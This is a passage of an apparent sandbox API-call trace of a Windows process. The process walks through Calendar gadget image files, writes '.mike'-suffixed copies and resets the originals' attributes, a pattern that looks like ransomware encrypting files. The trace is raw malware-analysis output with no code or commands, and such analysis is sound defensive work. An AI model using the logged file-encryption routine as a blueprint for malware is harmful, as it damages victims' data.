lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x213994c*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0131.354] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png.mike", lpFilePart=0x0) returned 0x59 [0131.354] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0131.356] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0131.356] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png.mike", lpFilePart=0x0) returned 0x59 [0131.356] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0131.356] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0131.356] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png", dwFileAttributes=0x80) returned 0 [0131.357] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png", lpFilePart=0x0) returned 0x54 [0131.358] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png.mike", lpFilePart=0x0) returned 0x59 [0131.358] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0131.358] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0131.358] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-down.png.mike", lpFilePart=0x0) returned 0x59 [0131.359] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png", lpFilePart=0x0) returned 0x53 [0131.359] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0131.360] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0131.361] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0131.361] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0131.361] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0131.361] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.361] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0131.362] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0131.362] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0131.362] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0131.362] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0131.362] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png.mike", lpFilePart=0x0) returned 0x58 [0131.362] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0131.362] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0131.363] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png", lpFilePart=0x0) returned 0x53 [0131.363] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png", lpFilePart=0x0) returned 0x53 [0131.363] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0131.363] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0131.363] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0131.363] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0131.364] WriteFile (in: hFile=0x284, lpBuffer=0x213edc0*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x213edc0*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0131.365] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0131.365] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0131.365] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0131.365] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0131.365] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0131.368] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png.mike", lpFilePart=0x0) returned 0x58 [0131.368] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0131.368] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0131.369] WriteFile (in: hFile=0x284, lpBuffer=0x2143b94*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2143b94*, lpNumberOfBytesWritten=0x2af074*=0x250, lpOverlapped=0x0) returned 1 [0131.369] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb08, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png.mike", lpFilePart=0x0) returned 0x58 [0131.369] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0131.369] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0131.371] WriteFile (in: hFile=0x284, lpBuffer=0x2146ddc*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x2146ddc*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0131.371] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png.mike", lpFilePart=0x0) returned 0x58 [0131.371] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0131.371] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0131.371] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png.mike", lpFilePart=0x0) returned 0x58 [0131.372] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0131.372] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0131.372] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png", dwFileAttributes=0x80) returned 0 [0131.373] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png", lpFilePart=0x0) returned 0x53 [0131.373] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png.mike", lpFilePart=0x0) returned 0x58 [0131.373] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0131.374] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0131.374] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext-hot.png.mike", lpFilePart=0x0) returned 0x58 [0131.375] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0131.376] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0131.376] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png", nBufferLength=0x105, lpBuffer=0x2aeb18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png", lpFilePart=0x0) returned 0x4f [0131.376] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0131.376] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0131.377] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0131.377] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.377] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0131.377] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0131.377] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0131.377] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0131.378] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0131.378] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png.mike", lpFilePart=0x0) returned 0x54 [0131.378] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0131.378] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0131.378] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png", lpFilePart=0x0) returned 0x4f [0131.378] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0131.379] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0131.379] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0131.379] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0131.379] WriteFile (in: hFile=0x284, lpBuffer=0x214c13c*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x214c13c*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0131.380] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0131.380] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0131.381] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0131.381] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0131.381] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0131.382] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png.mike", lpFilePart=0x0) returned 0x54 [0131.382] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0131.382] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0131.383] WriteFile (in: hFile=0x284, lpBuffer=0x21504a4*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x21504a4*, lpNumberOfBytesWritten=0x2af074*=0xd0, lpOverlapped=0x0) returned 1 [0131.383] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0131.383] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0131.384] WriteFile (in: hFile=0x284, lpBuffer=0x21536dc*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x21536dc*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0131.385] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png.mike", lpFilePart=0x0) returned 0x54 [0131.385] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0131.385] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0131.385] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png.mike", lpFilePart=0x0) returned 0x54 [0131.385] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0131.386] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0131.386] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png", dwFileAttributes=0x80) returned 0 [0131.387] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png", lpFilePart=0x0) returned 0x4f [0131.387] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png.mike", lpFilePart=0x0) returned 0x54 [0131.387] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0131.388] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0131.388] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bNext.png.mike", lpFilePart=0x0) returned 0x54 [0131.389] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0131.390] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0131.390] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0131.390] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0131.391] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0131.391] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.391] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0131.391] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0131.391] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0131.391] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0131.392] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0131.392] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png.mike", lpFilePart=0x0) returned 0x5c [0131.392] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0131.392] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0131.392] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png", lpFilePart=0x0) returned 0x57 [0131.392] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0131.393] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0131.393] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0131.393] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0131.393] WriteFile (in: hFile=0x284, lpBuffer=0x2158b8c*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2158b8c*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0131.394] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0131.395] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0131.395] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0131.395] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0131.395] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0131.396] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png.mike", lpFilePart=0x0) returned 0x5c [0131.396] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0131.397] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0131.397] WriteFile (in: hFile=0x284, lpBuffer=0x215cf64*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x215cf64*, lpNumberOfBytesWritten=0x2af074*=0xe0, lpOverlapped=0x0) returned 1 [0131.397] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0131.397] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0131.398] WriteFile (in: hFile=0x284, lpBuffer=0x21601bc*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x21601bc*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0131.399] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png.mike", lpFilePart=0x0) returned 0x5c [0131.399] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0131.399] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0131.399] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png.mike", lpFilePart=0x0) returned 0x5c [0131.400] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0131.400] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0131.400] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png", dwFileAttributes=0x80) returned 0 [0131.401] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png", lpFilePart=0x0) returned 0x57 [0131.401] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png.mike", lpFilePart=0x0) returned 0x5c [0131.401] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0131.402] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0131.402] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-disable.png.mike", lpFilePart=0x0) returned 0x5c [0131.403] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0131.404] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0131.404] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0131.405] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0131.405] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0131.405] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.405] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0131.405] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0131.406] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0131.406] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0131.406] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0131.406] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-down.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-down.png.mike", lpFilePart=0x0) returned 0x59 [0131.406] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0131.406] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0131.407] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-down.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bPrev-down.png", lpFilePart=0x0) returned 0x54 [0131.407] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0131.407] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0131.407] 